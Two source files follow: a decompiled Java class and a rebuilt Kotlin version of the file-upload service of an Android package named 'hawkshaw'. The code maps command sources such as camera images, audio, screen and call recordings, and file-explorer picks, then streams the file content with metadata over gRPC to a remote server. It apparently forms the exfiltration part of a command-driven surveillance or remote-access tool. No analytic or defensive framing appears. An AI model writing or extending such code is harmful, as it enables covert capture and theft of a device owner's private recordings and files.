File: Dummy/hawkshaw/library/datalayer/network/service/FileServiceKt.java
package com.hawkshaw.library.datalayer.network.service;

import Y1.C0106f;
import com.hawkshaw.library.FileServiceGrpcKt;
import com.hawkshaw.library.FileUploadRequest;
import com.hawkshaw.library.datalayer.models.Command;
import com.hawkshaw.library.datalayer.network.grpc.GrpcChannelKt;
import j3.f;

public final class FileServiceKt {
    /* access modifiers changed from: private */
    public static final FileServiceGrpcKt.FileServiceCoroutineStub fileService = new FileServiceGrpcKt.FileServiceCoroutineStub(GrpcChannelKt.getChannel(), (C0106f) null, 2, (f) null);

    public /* synthetic */ class WhenMappings {
        public static final /* synthetic */ int[] $EnumSwitchMapping$0;

        /* JADX WARNING: Can't wrap try/catch for region: R(17:0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|17) */
        /* JADX WARNING: Failed to process nested try/catch */
        /* JADX WARNING: Missing exception handler attribute for start block: B:11:0x0034 */
        /* JADX WARNING: Missing exception handler attribute for start block: B:13:0x003d */
        /* JADX WARNING: Missing exception handler attribute for start block: B:3:0x0010 */
        /* JADX WARNING: Missing exception handler attribute for start block: B:5:0x0019 */
        /* JADX WARNING: Missing exception handler attribute for start block: B:7:0x0022 */
        /* JADX WARNING: Missing exception handler attribute for start block: B:9:0x002b */
        static {
            /*
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source[] r0 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.values()
                int r0 = r0.length
                int[] r0 = new int[r0]
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.CameraImage     // Catch:{ NoSuchFieldError -> 0x0010 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0010 }
                r2 = 1
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0010 }
            L_0x0010:
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.VideoRecording     // Catch:{ NoSuchFieldError -> 0x0019 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0019 }
                r2 = 2
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0019 }
            L_0x0019:
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.AudioRecording     // Catch:{ NoSuchFieldError -> 0x0022 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0022 }
                r2 = 3
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0022 }
            L_0x0022:
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.Screenshot     // Catch:{ NoSuchFieldError -> 0x002b }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x002b }
                r2 = 4
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x002b }
            L_0x002b:
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.ScreenRecording     // Catch:{ NoSuchFieldError -> 0x0034 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0034 }
                r2 = 5
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0034 }
            L_0x0034:
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.FileExplorer     // Catch:{ NoSuchFieldError -> 0x003d }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x003d }
                r2 = 6
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x003d }
            L_0x003d:
                com.hawkshaw.library.datalayer.models.Command$FileRequest$Source r1 = com.hawkshaw.library.datalayer.models.Command.FileRequest.Source.CallRecording     // Catch:{ NoSuchFieldError -> 0x0046 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0046 }
                r2 = 7
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0046 }
            L_0x0046:
                $EnumSwitchMapping$0 = r0
                return
            */
            throw new UnsupportedOperationException("Method not decompiled: com.hawkshaw.library.datalayer.network.service.FileServiceKt.WhenMappings.<clinit>():void");
        }
    }

    /* access modifiers changed from: private */
    public static final FileUploadRequest.MetaData.Source toSource(Command.FileRequest.Source source) {
        switch (WhenMappings.$EnumSwitchMapping$0[source.ordinal()]) {
            case 1:
                return FileUploadRequest.MetaData.Source.CameraImage;
            case 2:
                return FileUploadRequest.MetaData.Source.VideoRecording;
            case 3:
                return FileUploadRequest.MetaData.Source.AudioRecording;
            case 4:
                return FileUploadRequest.MetaData.Source.Screenshot;
            case 5:
                return FileUploadRequest.MetaData.Source.ScreenRecording;
            case 6:
                return FileUploadRequest.MetaData.Source.FileExplorer;
            case 7:
                return FileUploadRequest.MetaData.Source.CallRecording;
            default:
                throw new RuntimeException();
        }
    }
}

File: app/src/main/java/com/hawkshaw/library/datalayer/network/service/FileServiceKt.kt
package com.hawkshaw.library.datalayer.network.service

import com.hawkshaw.library.FileServiceGrpcKt
import com.hawkshaw.library.FileUploadRequest
import com.hawkshaw.library.datalayer.models.Command
import com.hawkshaw.library.datalayer.network.grpc.GrpcChannelKt
import com.hawkshaw.library.datalayer.network.grpc.grpcCall
import com.hawkshaw.library.datalayer.network.grpc.grpcCallFlow
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.flowOf
import android.util.Log
// Import for ByteString is removed as setContent now expects ByteArray
// import com.google.protobuf.ByteString

/**
 * Kotlin utilities for the File Service that handles file uploads via gRPC.
 */
object FileServiceKt {
    private const val TAG = "FileServiceKtLogs"

    init {
        Log.d(TAG, "[DEBUG] FileServiceKt object initialized/accessed.")
    }

    /**
     * The FileService gRPC stub for making file-related calls.
     * FIXED: Access GrpcChannelKt.channel directly instead of GrpcChannelKt.getChannel()
     */
    private val fileService by lazy {
        Log.d(TAG, "[DEBUG] Initializing fileService gRPC stub...")
        val stub = FileServiceGrpcKt.FileServiceCoroutineStub(GrpcChannelKt.channel)
        Log.d(TAG, "[DEBUG] fileService gRPC stub initialized: $stub")
        stub
    }

    /**
     * Converts a Command.FileRequest.Source enum to a FileUploadRequest.MetaData.Source enum.
     * 
     * @param source The source type from the Command model
     * @return The corresponding source type for the FileUploadRequest model
     * @throws RuntimeException if the source type is not recognized
     */
    internal fun toSource(source: Command.FileRequest.Source): Int {
        Log.d(TAG, "[DEBUG] toSource called. Input source: $source")
        val result = when (source) {
            Command.FileRequest.Source.CameraImage -> 1
            Command.FileRequest.Source.VideoRecording -> 2
            Command.FileRequest.Source.AudioRecording -> 3
            Command.FileRequest.Source.Screenshot -> 4
            Command.FileRequest.Source.ScreenRecording -> 5
            Command.FileRequest.Source.FileExplorer -> 6
            Command.FileRequest.Source.CallRecording -> 7
            else -> 0
        }
        Log.d(TAG, "[DEBUG] toSource: Mapped '$source' to integer value: $result")
        return result
    }
    
    /**
     * Creates a FileUploadRequest.MetaData object from a Command.FileRequest.
     * 
     * @param request The file request from a Command
     * @return A MetaData object configured for use in FileUploadRequest
     */
    fun createMetaData(request: Command.FileRequest): FileUploadRequest {
        Log.d(TAG, "[DEBUG] createMetaData called. Input Command.FileRequest path: ${request.path}")
        val filename = request.path.substringAfterLast('/')
        val mimeType = "application/octet-stream" // Default mimeType
        Log.d(TAG, "[DEBUG] createMetaData: Extracted filename: '$filename', MimeType: '$mimeType'")

        val metadataProto = FileUploadRequest.MetaData.newBuilder()
            .setFilename(filename)
            .setMimeType(mimeType)
            .build()
        Log.d(TAG, "[DEBUG] createMetaData: Built FileUploadRequest.MetaData: $metadataProto")
            
        val fileUploadRequest = FileUploadRequest.newBuilder()
            .setMetadata(metadataProto) // Sets the 'oneof' payload to metadata
            .build()
        Log.d(TAG, "[DEBUG] createMetaData: Built FileUploadRequest (with metadata only): $fileUploadRequest")
        return fileUploadRequest
    }

    /**
     * Uploads a file to the server by sending metadata first, then the file content.
     * 
     * @param fileBytes The file content as a ByteArray.
     * @param metadataMessage A FileUploadRequest message that already contains the metadata.
     * @return The server's response flow to the file upload.
     */
    suspend fun uploadFile(fileBytes: ByteArray, metadataMessage: FileUploadRequest): Flow<com.hawkshaw.library.FileUploadResponse> = grpcCall {
        Log.d(TAG, "[DEBUG] uploadFile suspend function called. fileBytes size: ${fileBytes.size}, metadataMessage: $metadataMessage")

        // Validate that the incoming metadataMessage actually contains metadata
        if (!metadataMessage.hasMetadata()) {
            // Removed .payloadCase from the log message as it was causing an unresolved reference
            val errorMsg = "Input metadataMessage does not contain metadata!"
            Log.e(TAG, "[DEBUG] uploadFile: $errorMsg")
            throw IllegalArgumentException(errorMsg)
        }
        Log.d(TAG, "[DEBUG] uploadFile: Validated metadataMessage contains metadata: ${metadataMessage.getMetadata()}")

        // Create the FileUploadRequest.File part
        val fileProto = FileUploadRequest.File.newBuilder()
            .setContent(fileBytes) // Corrected: setContent expects ByteArray directly
            .build()
        Log.d(TAG, "[DEBUG] uploadFile: Built FileUploadRequest.File. Content size: ${fileBytes.size}")
            
        // Create the FileUploadRequest message for the file content part
        val fileContentMessage = FileUploadRequest.newBuilder()
            .setFile(fileProto) // This sets the 'oneof' payload to file
            .build()
        Log.d(TAG, "[DEBUG] uploadFile: Built FileUploadRequest for file content: $fileContentMessage")
            
        // Create a flow that first sends the metadata message, then the file content message
        val requestStream = flowOf(metadataMessage, fileContentMessage)
        Log.d(TAG, "[DEBUG] uploadFile: Calling fileService.uploadFile with request stream (metadata then file content).")

        val responseFlow = fileService.uploadFile(requestStream)
        Log.d(TAG, "[DEBUG] uploadFile: fileService.uploadFile call initiated. Response (as Flow): $responseFlow")
        responseFlow // Return the Flow<FileUploadResponse>
    }
}

